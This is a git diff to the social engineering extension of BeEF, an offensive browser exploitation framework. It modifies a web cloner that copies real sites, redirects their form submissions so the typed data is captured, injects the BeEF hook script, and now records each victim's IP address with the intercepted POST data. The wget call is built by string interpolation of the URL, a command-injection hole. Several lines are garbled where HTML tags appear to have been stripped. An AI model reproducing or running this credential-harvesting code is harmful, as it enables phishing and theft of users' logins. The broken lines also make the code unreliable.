diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb index 9a72cf64d..ab92cdadd 100644 --- a/extensions/social_engineering/models/interceptor.rb +++ b/extensions/social_engineering/models/interceptor.rb @@ -23,7 +23,7 @@ module BeEF storage_names[:default] = 'extension_seng_interceptor' property :id, Serial - + property :ip, Text, :lazy => false property :post_data, Text, :lazy => false belongs_to :webcloner diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb index fcb1c408b..cc3470333 100644 --- a/extensions/social_engineering/rest/socialengineering.rb +++ b/extensions/social_engineering/rest/socialengineering.rb @@ -53,7 +53,17 @@ module BeEF end web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance - web_cloner.clone_page(uri,mount) + success = web_cloner.clone_page(uri,mount) + if success + result = { + "success" => true, + "mount" => mount + }.to_json + else + result = { + "success" => false + }.to_json + end end rescue Exception => e diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb index d8d19dfaa..17e4e57c1 100644 --- a/extensions/social_engineering/web_cloner/interceptor.rb +++ b/extensions/social_engineering/web_cloner/interceptor.rb @@ -25,7 +25,7 @@ module BeEF # intercept GET get "/" do - print_info "GET request" + print_info "GET request from IP #{request.ip}" print_info "Referer: #{request.referer}" cloned_page = settings.cloned_page cloned_page @@ -33,7 +33,7 @@ module BeEF # intercept POST post "/" do - print_info "POST request" + print_info "POST request from IP #{request.ip}" request.body.rewind data = request.body.read print_info "Intercepted data:" @@ -41,7 +41,8 @@ module BeEF interceptor_db = BeEF::Core::Models::Interceptor.new( :webcloner_id => settings.db_entry.id, - :post_data => data + :post_data => data, + :ip => request.ip ) interceptor_db.save diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb index 1e3c68205..02637908d 100644 --- a/extensions/social_engineering/web_cloner/web_cloner.rb +++ b/extensions/social_engineering/web_cloner/web_cloner.rb @@ -34,55 +34,69 @@ module BeEF output_mod = "#{output}_mod" user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent') - #todo: prevent command injection using IO.popen passing an array of arguments - # see here: http://devblog.avdi.org/2012/03/29/generating-cows-with-io-popen/ - wget = "wget '#{url}' --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}" - IO.popen(wget.to_s) { |f| result = f.gets } - File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file| - File.open("#{@cloned_pages_dir + output}", 'r').each do |line| - # Modify the
line changing the action URI to / in order to be properly intercepted by BeEF - if line.include?(" line changing the action URI to / in order to be properly intercepted by BeEF + if line.include?("") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') + out_file.print add_beef_hook(line) + print_info "BeEF hook added :-D" + else + out_file.print line end - line_attrs[count] = "action=\"#{mount}\"" - mod_form = line_attrs.join(" ") - print_info "Form action value changed to / in order to be intercepted." - out_file.print mod_form - # Add the BeEF hook - elsif line.include?("") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') - out_file.print add_beef_hook(line) - print_info "Added BeEF hook." - else - out_file.print line end end + + if File.size("#{@cloned_pages_dir + output}") > 0 + print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" + + file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve + + # Check if the original URL can be framed + frameable = is_frameable(url) + + interceptor = BeEF::Extension::SocialEngineering::Interceptor + interceptor.set :redirect_to, url + interceptor.set :frameable, frameable + interceptor.set :beef_hook, @beef_hook + interceptor.set :cloned_page, get_page_content(file_path) + interceptor.set :db_entry, persist_page(url,mount) + + @http_server.mount("#{mount}", interceptor.new) + print_info "Mounting cloned page on URL [#{mount}]" + @http_server.remap + success = true + else + print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'." + end end - print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" - - file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve - - # Check if the original URL can be framed - frameable = is_frameable(url) - - interceptor = BeEF::Extension::SocialEngineering::Interceptor - interceptor.set :redirect_to, url - interceptor.set :frameable, frameable - interceptor.set :beef_hook, @beef_hook - interceptor.set :cloned_page, get_page_content(file_path) - interceptor.set :db_entry, persist_page(url,mount) - - @http_server.mount("#{mount}", interceptor.new) - print_info "Mounting cloned page on URL [#{mount}]" - @http_server.remap + success end private